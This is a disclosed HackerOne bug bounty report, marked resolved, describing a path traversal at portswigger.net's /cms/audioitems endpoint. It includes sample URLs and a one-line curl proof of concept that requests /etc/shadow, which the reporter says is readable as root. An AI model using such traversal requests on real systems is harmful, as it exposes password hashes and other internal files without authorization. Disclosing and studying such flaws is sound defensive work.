[portswigger.net] Path Traversal al /cms/audioitems

Disclosed: 2024-04-04 14:51:59 By 0xd0m7 To portswigger

High

Vulnerability Details

Prelude. I wasn't going to report it, I thought it was your laboratory but after my first analysis this seems real. **Description** It's detected a path traversal as root user that allows to remote attackers see internal files as root. `https://portswigger.net/cms/audioitems//etc/networks` `https://portswigger.net/cms/audioitems//etc/shadow` **Poc** `curl -kis "https://portswigger.net/cms/audioitems//etc/shadow"` {F3132191} ## Impact Abilit to read internal files as root

Actions

View on HackerOne

Report Stats

Report ID: 2424815
State: Closed
Substate: resolved
Upvotes: 133

[portswigger.net] Path Traversal al /cms/audioitems

Vulnerability Details

Actions

Report Stats

Share this report